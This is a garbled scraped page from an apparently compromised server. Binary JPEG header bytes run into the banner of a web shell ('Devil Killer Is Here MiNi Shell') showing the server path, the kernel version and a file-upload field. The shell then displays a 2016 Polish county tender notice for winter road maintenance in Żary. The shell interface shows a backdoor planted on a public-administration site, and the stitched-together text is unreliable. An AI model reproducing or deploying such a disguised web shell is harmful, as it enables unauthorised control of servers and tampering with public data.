JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161004/317133-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 317133 - 2016
              z dnia 2016-10-04 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żary: Usługi świadczone przy zimowym utrzymaniu dróg powiatowych w sezonie  2016/2017.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Żarski, krajowy numer identyfikacyjny
              97077016100000, ul.
              Al. Jana Pawła II 
              5,
              68200  
              Żary, woj.
              lubuskie, państwo
              , tel.
              684 790 600, e-mail
              j.chomik@powiatzarski.pl, faks
              684 790 601.
              <br />
              Adres strony internetowej (URL): www.powiatzary.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.powiatzary.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />kurier, posłaniec, goniec, osobiście przez Wykonwcę<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />operator pocztowy<br />
                Adres:
                <br />68-200 Żary, al. Jana Pawła II 5</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługi świadczone przy zimowym utrzymaniu dróg powiatowych w sezonie  2016/2017.
<br /><b>Numer referencyjny: </b>WIGN.272.38.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem  zamówienia jest świadczenie usług zimowego utrzymania dróg powiatowych w   
   sezonie 2016/2017  z podziałem na   części ( zadania):
Część  Nr  1  
Zimowe utrzymanie dróg powiatowych w południowej  części Powiatu Żarskiego,  na terenie gminy: Żary, Miasta Żary.
Wykaz dróg stanowi załącznik do niniejszej SIWZ.

Część  Nr  2  
Zimowe utrzymanie dróg powiatowych w południowej  części Powiatu Żarskiego,  na terenie gminy: Żary, Lipinki Łużycki, Trzebiel, Tuplice.
Wykaz dróg stanowi załącznik do niniejszej SIWZ.

Część  Nr  3  
Zimowe utrzymanie dróg powiatowych w północnej części Powiatu Żarskiego na terenie 
Miasta i Gminy Lubsko, Miasta i Gminy Jasień, Gminy Brody, i Gminy Tuplice
Wykaz dróg stanowi załącznik do niniejszej SIWZ

2. STANDARTY UTRZYMANIA  DRÓG  W  OKRESIE  ZIMOWYM NA  DROGACH         
    ZARZĄDZANYCH  PRZEZ  POWIAT ŻARSKI  stanowi załącznik do niniejszej SIWZ.

3.Zakres usług obejmuje:

3.1.	Utrzymywanie ciągłej przejezdności dróg i ulic poprzez odśnieżanie całej sieci dróg objętych umową.
3.2.Zwalczanie śliskości pośniegowej i gołoledzi poprzez posypywanie całej sieci dróg objętych 
      umową.
3.3.	Oczyszczanie podczas roztopów wpustów ulicznych z błota i śniegu
3.4. Zamiatanie ulic min.dwa razy w miesiącu (usługa w ramach dyżurów), gdy przerwa w robotach ZUD wynosi 14 dni.
3.5.Oczyszczenie wpustów ulicznych oraz usunięcie piasku pozostałego po akcji zimowej, w terminie 
     do 10 kwietnia 2017 r.
3.6.Zapewnienie materiałów służących do skutecznego zwalczania śliskości pośniegowej i gołoledzi.
3.7.	Całodobowe pełnienie dyżurów z gotowością sprzętu i transportu oraz natychmiastowe 
      rozpoczynanie robót po wystąpieniu warunków zimowych opisanych w specyfikacjach: 
       ODŚNIEŻANIE   DROGI  oraz ZAPOBIEGANIE POWSTAWANIU I LIKWIDACJA 
       ŚLISKOŚCI ZIMOWEJ
3.8.	Prowadzenie ewidencji dziennej wykonywanych robót, rejestrowanie istotnych zdarzeń oraz opis stanu  i przejezdności dróg.
3.9.	Do każdej faktury należy dołączyć potwierdzony wykaz, zawierający: 
- datę świadczenia usługi,
- numery rejestracyjne pojazdów pracujących przy ZUD,
- godzinę wyjazdu, rodzaj usługi, numery dróg, na których pojazd świadczył usługę oraz godzinę  
  doprowadzenia stanu drogi do warunków określonych w specyfikacjach,
- wydruk z systemu GPS
3.10.Ponoszenie odpowiedzialności i pokrywanie w pełnej wysokości za szkody wynikające z 
       nienależytego wykonania robót.
3.11.Zapewnienie stałej łączności oraz przekazywanie do Starostwa Powiatowego w Żarach 
        rzetelnych informacji na temat przejezdności dróg.
3.12..Baza sprzętowa do prowadzenia robót ZUD powinna mieścić się na terenie objętym tymi robotami  tj. na terenie Powiatu Żarskiego. Oddalenie bazy od strefy obsługiwanej sprzętem do ZUD o każde  10 km, musi być rekompensowane skierowaniem do pracy, bez dodatkowego wynagrodzenia, dodatkowych jednostek będących własnością Wykonawcy. Przy odległości większej niż 10 km obowiązuje wielokrotność podstawionych do realizacji zadania jednostek sprzętowych, będących własnością  Wykonawcy. 
3.13.Pozostawanie w całodobowej gotowości sprzętu i pracowników w okresie, gdy w danym dniu,                   
        w godzinach nocnych oraz rannych, nie zachodzi konieczność odśnieżania dróg lub likwidacji 
       gołoledzi. 
4.	Przy świadczeniu usług obowiązywać będą następujące terminy:
- gotowość sprzętu na dzień 01 listopada 2016r.,
- rozpoczęcie usługi  pracy sprzętu na wezwanie zamawiającego nie później niż w ciągu dwóch godzin od wezwania,
- w przypadku braku pracy sprzętu, wyznacza się datę rozpoczęcia dyżurów na dzień 15 listopada 2016 roku.
- zakończenie usługi poda zamawiający z jednodniowym wyprzedzeniem.

5.	Wykaz dróg miejskich i zamiejskich  ich długości z podziałem na standardy zimowego utrzymania dla poszczególnych części zamówienia, mapa powiatu żarskiego do akcji zimowej oraz specyfikacje techniczne  określone są w załącznikach do niniejszej specyfikacji. 
<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><b> Dodatkowe kody CPV:</b>90630000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje zamówienia, o których mowa w art. 67 ust. 1 pkt 6 Pzp w przypadku wystąpienia niekorzystnych warunków atmosferycznych, tj. ciągłych opadów śniegu, gołoledzi. Zamówienie polega na powtórzeniu usług opisanych w pkt. 3 SIWZ.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/11/2016
                    data zakończenia: 31/03/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunek zostanie spełniony jeżeli Wykonawca jest ubezpieczony od   
                                      odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z 
                                       przedmiotem zamówienia. Suma gwarancyjna  100 000,00 zł.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek zostanie uznany za spełniony jeżeli wykonawca:
                                  1)  wykaże,  że wykonał usługi przy zimowym utrzymaniu dróg na drogach 
                                      kategorii nie niższej  niż drogi powiatowe wraz z załaczeniem dowodów ( np.  
                                      referencje), że usługi zostały  wykonane należycie. Progu kwotowego 
                                      zamawiajacy nie stawia.

                                  2) wykaze że dysponuje:
                                    - piaskarka minimum 2 szt.
                                    - pług odśnieżny minimum  2 szt.
                                    - sprzęt do usuwania zasp śnieżnych (np. równiarka) minimum 1 szt.
                                    - wytwornica solanki minimum 1 szt.
                                    - ładowarka minimum 1 szt.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)	oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy  w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załaczeniem dowodów określających czy te usługi zostały wykonanw należycie, wg załącznika nr 6 do SIWZ składanego na wezwanie Zamawiającego.
                             2. Wykaz  urządzeń technicznych dostępnych wykonawcy usług w celu 
                             realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami 
wg załącznika nr 7 do SIWZ składanego na wezwanie Zamawiającego.

                             3.  Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, 
                             że wykonawca jest   ubezpieczony od odpowiedzialności cywilnej  w zakresie   
                             prowadzonej działalności związanej z przedmiotem zamówienia składanego na 
                             wezwanie Zamawiającego.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">a.  wypełniony formularz ofertowy  wg załącznika nr 1.
b. w przypadku Wykonawców występujących wspólnie  pełnomocnictwo, o którym mowa w 
pkt. 12.7 niniejszej SIWZ 
c. parafowany wzór umowy
d. dowód wniesienia wadium
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Zamawiający żąda wniesienia wadium w kwocie:
- część 1 ( zadanie 1)  2 000,00  zł.
- część 2 ( zadanie 2)  5 000,00 zł 
- część 3 ( zadanie 3)  8 000,00 zł 
 2. Wadium może być  wnoszone w :
        - pieniądzu
        - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,   
          z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
        - gwarancjach bankowych, gwarancjach ubezpieczeniowych,
        - poręczeniach udzielanych przez podmioty, o których  mowa w art. 6b ust. 5 pkt 2 ustawy z   
          dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
          ( Dz. U.  Nr 109, poz. 1158 z późn. zm.)
     3. Wadium wnoszone w pieniądzu wpłaca się przelewem  na konto Zamawiającego  
           nr. 21 1020 5460 0000 5102 0006 0517. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli do podanego w pkt. 17 ppkt 3) terminu znajdzie się ono na rachunku bankowym Zamawiającego.
  4.Zamawiający zwróci wadium zgodnie z przepisami art. 46 ust. 1, 1a  i 2 ustawy.
  5.Wykonawca traci wadium na rzecz zamawiającego  w przypadkach określonych w art. 46 ust.  
        4a i ust 5  ustawy.
  6.Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono 
        wadium  na podstawie art. 46 ust.1, jeżeli w wyniku rozstrzygnięcia  odwołania jego oferta została    
        wybrana   jako najkorzystniejsza.
 7.Oferta nie zabezpieczona  wadium stanowić będzie podstawę od jej odrzucenia
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
